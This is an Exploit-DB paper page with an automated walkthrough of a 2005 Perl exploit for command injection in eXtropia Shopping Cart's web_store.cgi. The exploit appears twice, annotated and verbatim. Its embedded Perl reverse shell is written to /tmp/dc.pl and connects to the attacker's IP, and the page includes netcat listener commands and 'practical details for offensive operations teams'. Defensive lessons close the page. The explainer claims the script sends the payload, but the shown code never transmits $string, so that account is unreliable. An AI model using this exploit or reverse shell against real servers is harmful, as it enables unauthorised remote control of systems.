By exploitdb papers bot•June 15, 2005•
papers
Understanding the eXtropia Shopping Cart 'web_store.cgi' Remote Command Execution Exploit
Understanding the eXtropia Shopping Cart 'web_store.cgi' Remote Command Execution Exploit
What this paper is
This paper details a remote command execution vulnerability found in the web_store.cgi script of the eXtropia Shopping Cart application. The exploit, written in Perl, leverages this vulnerability to execute arbitrary commands on the target server and establish a reverse shell connection back to the attacker's machine.
Simple technical breakdown
The core of the vulnerability lies in how the web_store.cgi script handles user-supplied input. It appears to be susceptible to command injection through specially crafted URL parameters. The exploit constructs a malicious URL that, when processed by the vulnerable CGI script, tricks it into executing a Perl script embedded within the URL itself. This embedded Perl script then attempts to establish a reverse shell connection.
The exploit works in two main stages:
- Command Injection: The exploit sends a crafted HTTP POST request to the
web_store.cgiscript. This request includes apageparameter that contains a command injection payload. The payload first usescd /tmpto change the directory to/tmp(a common location for temporary files and often writable by web servers) and then usesecho ... >> dc.plto write a Perl script into a file nameddc.plin the/tmpdirectory. - Reverse Shell Execution: After writing the
dc.plfile, the exploit executes it usingperl dc.pl <attacker_ip> <attacker_port>. This Perl script (dc.pl) is designed to connect back to the attacker's listening netcat instance, providing a shell on the compromised server.
Complete code and payload walkthrough
The provided Perl script acts as an exploit client. It gathers information from the user and then constructs and sends the malicious HTTP request.
#!/usr/bin/perl -w
# ... (header comments and greetings) ...
use IO::Socket;
# ... (print statements for banner and greetings) ...
print "enter hostname or ip : \n";
chomp($server=<STDIN>); # Gets the target server's hostname or IP address.
print "port: (default: 80)\n";
chomp($port=<STDIN>); # Gets the target port.
$port=80 if ($port =~/\D/ ); # If input is not a digit, default to 80.
$port=80 if ($port eq "" ); # If input is empty, default to 80.
print "path: (???/web_store.cgi?)\n";
chomp($path=<STDIN>); # Gets the path to the vulnerable web_store.cgi script.
print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>); # Gets the attacker's IP address for the reverse shell.
print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>); # Gets the attacker's port for the reverse shell.
print "ok Remote Command Execution now Start";
print "|+| try to exploiting...\n";
# This is the core of the exploit payload construction.
$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}.
" >>dc.pl;perl dc.pl $ip $reverse|";
# Explanation of the $string variable:
# - "/$path/web_store.cgi?page=.html": This part targets the web_store.cgi script with a 'page' parameter.
# The '.html' is likely a placeholder or part of a legitimate parameter that is being bypassed.
# - "|": This is a pipe character, used to chain commands in a shell.
# - "cd /tmp": Changes the current directory to /tmp. This is a common technique to write files in a
# location that is usually writable by the web server process.
# - ";": Command separator.
# - "echo ".q{...}." >>dc.pl": This is the command that writes the embedded Perl script into a file
# named 'dc.pl' in the /tmp directory.
# - q{...}: This is a Perl quoting operator. It treats the content within the curly braces as a
# single string, similar to single quotes, but allows for easier handling of special characters
# within the string itself.
# - The content within q{...} is the actual Perl reverse shell code.
# - use Socket;: Imports the Socket module for network operations.
# - $execute= 'echo "`uname -a`";echo "`id`";/bin/sh';: Defines the commands to be executed
# once the shell is established. It first prints system information (`uname -a`), then the
# user ID (`id`), and finally starts an interactive shell (`/bin/sh`).
# - $target=$ARGV[0];: Assigns the first command-line argument (attacker's IP) to $target.
# - $port=$ARGV[1];: Assigns the second command-line argument (attacker's port) to $port.
# - $iaddr=inet_aton($target) || die("Error: $!\n");: Converts the target IP address into a
# network byte order integer.
# - $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");: Creates a sockaddr structure
# for the target address and port.
# - $proto=getprotobyname('tcp');: Gets the protocol number for TCP.
# - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");: Creates a TCP socket.
# - connect(SOCKET, $paddr) || die("Error: $!\n");: Connects the socket to the attacker's IP and port.
# - open(STDIN, ">&SOCKET");: Redirects standard input to the socket.
# - open(STDOUT, ">&SOCKET");: Redirects standard output to the socket.
# - open(STDERR, ">&SOCKET");: Redirects standard error to the socket.
# - system($execute);: Executes the commands defined in $execute.
# - close(STDIN);: Closes the standard input (which is now the socket).
# - ">>dc.pl": Appends the output of the echo command (the Perl script) to a file named dc.pl.
# - ";perl dc.pl $ip $reverse|": This part executes the newly created dc.pl script, passing the
# attacker's IP and port as arguments. The final pipe `|` is likely a remnant or intended for
# further command chaining, though it might not be strictly necessary for this specific payload.
print "|+| OK! \n";
print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";
print "|+| starting connect back on $ip :$reverse\n";
print "|+| DONE!\n";
print "|+| Look netcat windows\n\n";
# This section sends the actual HTTP request to the target server.
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die; # Creates a new TCP socket connection to the target server.
print $socket "POST $path HTTP/1.1\n"; # Sends the HTTP POST request line.
print $socket "Host: $server\n"; # Sets the Host header.
print $socket "Accept: */*\n"; # Sets the Accept header.
print $socket "User-Agent: blackbox\n"; # Sets a User-Agent header.
print $socket "Pragma: no-cache\n"; # Sets Pragma header.
print $socket "Cache-Control: no-cache\n"; # Sets Cache-Control header.
print $socket "Connection: close\n\n"; # Sets Connection header and ends headers.
print "have nice shell..."; # Informative message to the user.
# milw0rm.com [2005-06-15] # Reference to the original publication site.
Mapping list:
#!/usr/bin/perl -w: Shebang line indicating the script should be executed with Perl, with warnings enabled.use IO::Socket;: Imports the Perl module for network socket operations.chomp($server=<STDIN>);: Reads user input for the target server's hostname or IP.chomp($port=<STDIN>); $port=80 if ($port =~/\D/ ); $port=80 if ($port eq "" );: Reads user input for the target port, defaulting to 80 if non-numeric or empty.chomp($path=<STDIN>);: Reads user input for the path to the vulnerable CGI script.chomp($ip=<STDIN>);: Reads user input for the attacker's IP address.chomp($reverse=<STDIN>);: Reads user input for the attacker's port.$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{...}." >>dc.pl;perl dc.pl $ip $reverse|";: Constructs the full command injection payload./$path/web_store.cgi?page=.html: The target CGI script and its parameters.|cd /tmp;: Changes directory to/tmp.echo ".q{...}." >>dc.pl: Writes the embedded Perl reverse shell script to/tmp/dc.pl.use Socket;: Perl module for network sockets.$execute= 'echo "uname -a";echo "id";/bin/sh';: Commands to run on the target (system info and shell).$target=$ARGV[0]; $port=$ARGV[1];: Gets attacker IP and port from arguments.inet_aton($target): Converts IP to network byte order.sockaddr_in($port, $iaddr): Creates socket address structure.getprotobyname('tcp'): Gets TCP protocol number.socket(...): Creates a TCP socket.connect(SOCKET, $paddr): Connects to the attacker's listener.open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET");: Redirects stdin, stdout, stderr to the socket.system($execute);: Executes the defined commands.close(STDIN);: Closes the socket.
perl dc.pl $ip $reverse|: Executes the created Perl script.
$socket=IO::Socket::INET->new(...): Establishes a TCP connection to the target server.print $socket "POST $path HTTP/1.1\nHost: $server\n...";: Sends the crafted HTTP POST request containing the command injection payload.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication is required if the vulnerability is exposed directly.
- Lab Preconditions:
- A target vulnerable eXtropia Shopping Cart installation.
- A listener (e.g.,
nc -lvnp <your_port>) running on the attacker's machine to receive the reverse shell. - Network connectivity between the attacker and the target.
- Tooling Assumptions:
- Perl interpreter on the attacker's machine to run the exploit script.
- Netcat (
nc) on the attacker's machine for listening.
- Execution Pitfalls:
- Path Issues: The exploit assumes the web server has write permissions in
/tmp. If not, theecho ... >> dc.plcommand will fail. The script includes a hint to try other paths if/tmpis not writable. - Firewall/WAF: Network firewalls or Web Application Firewalls (WAFs) might block the crafted URL or the reverse shell connection.
- CGI Script Variations: Minor variations in the
web_store.cgiscript or its environment might cause the exploit to fail. The.htmlextension inpage=.htmlmight need adjustment based on how the script parses parameters. - Shell Not Vulnerable: The script explicitly mentions that if a connect-back shell is not found, the shell might not be vulnerable or the permissions might be insufficient.
- Input Sanitization: If the target system has updated its web application or has input sanitization in place, this specific injection vector might be blocked.
q{}Quoting: Theq{}quoting mechanism is used for the embedded Perl script. If the script itself contains curly braces, this might require careful escaping or a different quoting mechanism.
- Path Issues: The exploit assumes the web server has write permissions in
- Telemetry:
- Network Traffic: Outbound HTTP POST requests to the target server, containing the command injection payload. Inbound TCP connection from the target server to the attacker's listener port.
- Server Logs: Web server access logs showing requests to
web_store.cgi. Potential logs from the CGI process executing commands likecd,echo,perl. - File System: Creation of
/tmp/dc.plon the target server. - Process Execution: Execution of
/bin/shor other shells on the target server.
Where this was used and when
This exploit was published on June 15, 2005, by Action Spider from the SegmentationFault Group. At that time, web applications, especially those using CGI scripts, were common targets. The vulnerability likely existed in older versions of the eXtropia Shopping Cart application. Exploits from this era often targeted common web server vulnerabilities like command injection, SQL injection, and buffer overflows.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical lesson. All user-supplied input, especially data passed through URL parameters, form fields, or headers, must be rigorously validated and sanitized before being used in system commands or database queries. Never trust user input.
- Principle of Least Privilege: Ensure that web server processes run with the minimum necessary privileges. This limits the damage an attacker can do even if they achieve command execution. For instance, restricting write access to directories like
/tmpfor the web server user can mitigate some command injection techniques. - Secure Coding Practices: Developers should be trained in secure coding practices to avoid common vulnerabilities like command injection. Using parameterized queries for database interactions and avoiding direct execution of shell commands with user-supplied input are essential.
- Web Application Firewalls (WAFs): WAFs can help detect and block common injection patterns, providing an additional layer of defense. However, they are not a silver bullet and should be used in conjunction with secure coding.
- Regular Patching and Updates: Keep web applications and their underlying frameworks and server software up-to-date. Vendors often release patches for known vulnerabilities.
- Logging and Monitoring: Implement comprehensive logging for web server access and application events. Monitor these logs for suspicious activity, such as unusual command executions or unexpected file creations.
ASCII visual (if applicable)
+-----------------+ +-----------------------+ +---------------------+
| Attacker Machine| ----> | Target Web Server | ----> | Vulnerable web_store|
| (Perl Exploit) | | (HTTP Request) | | .cgi Script |
+-----------------+ +-----------------------+ +----------+----------+
^ |
| | (Command Injection)
| (Reverse Shell) v
+-----------------+ +-----------------------+ +---------------------+
| Attacker Machine| <---- | Target Web Server | <---- | /tmp/dc.pl (Perl) |
| (Netcat Listener)| | (Outbound Connection) | | (Executes commands) |
+-----------------+ +-----------------------+ +---------------------+This diagram illustrates the flow: the attacker's machine sends an HTTP request containing the exploit payload to the target web server. The vulnerable web_store.cgi script executes this payload, which writes a Perl script (dc.pl) to /tmp. This script then connects back to the attacker's netcat listener, establishing a reverse shell.
Source references
- PAPER ID: 1048
- PAPER TITLE: eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution
- AUTHOR: Action Spider
- PUBLISHED: 2005-06-15
- KEYWORDS: CGI,webapps
- PAPER URL: https://www.exploit-db.com/papers/1048
- RAW URL: https://www.exploit-db.com/raw/1048
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl -w
#
#********************************************************************************************
# Remote Command Execution Vulnerability In Web_store.cgi *
# *
# [SegmentationFault Group] *
# *
# *
# Greetz to : Xsupr3mo - failed - Status-x - Stealh - P3S4D3L0 *
# Greetz to : berhooz - nima - ehsan - Unknown OutLaw eutanasia *
# www.ashiyane.com *
# *
#********************************************************************************************
#ok setp by setp to work : * *
#[*] start exploit * If connect back shell not found: maybe :*
#[*] run in your system: nc -l -vv -p 2975 * you do not have perm to write in /tmp *
#[*] starting connect back on 127.0.0.1 :2975 * Shell not vulnerable *
#[*] DONE! * test and put in /$path/hints.pl?|cd /tmp*
#[*] Look netcat windows * other path that u know dont have perm *
# * *
#********************************************************************************************
#############################################################################################
use IO::Socket;
print "*****************************************************************\n";
print "\tRemote Command Execution Vulnerability in web_store.cgi\n ";
print "\t\t-=[ SegmentationFault Group ]=-\n";
print "\t\tcode writen by sun-os [ActionSpider]\n\n";
print "\tGerttz to : Xsupr3mo - failed - Status-x - Stealh";
print "\n\tand : Behrooz - nima - ehsan www.ashiyane.com\n";
print "*****************************************************************\n\n";
print "enter hostname or ip : \n";
chomp($server=<STDIN>);
print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );
print "path: (???/web_store.cgi?)\n";
chomp($path=<STDIN>);
print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);
print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);
print "ok Remote Command Execution now Start";
print "|+| try to exploiting...\n";
$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";
print "|+| OK! \n";
print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";
print "|+| starting connect back on $ip :$reverse\n";
print "|+| DONE!\n";
print "|+| Look netcat windows\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: blackbox\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "have nice shell...";
# milw0rm.com [2005-06-15]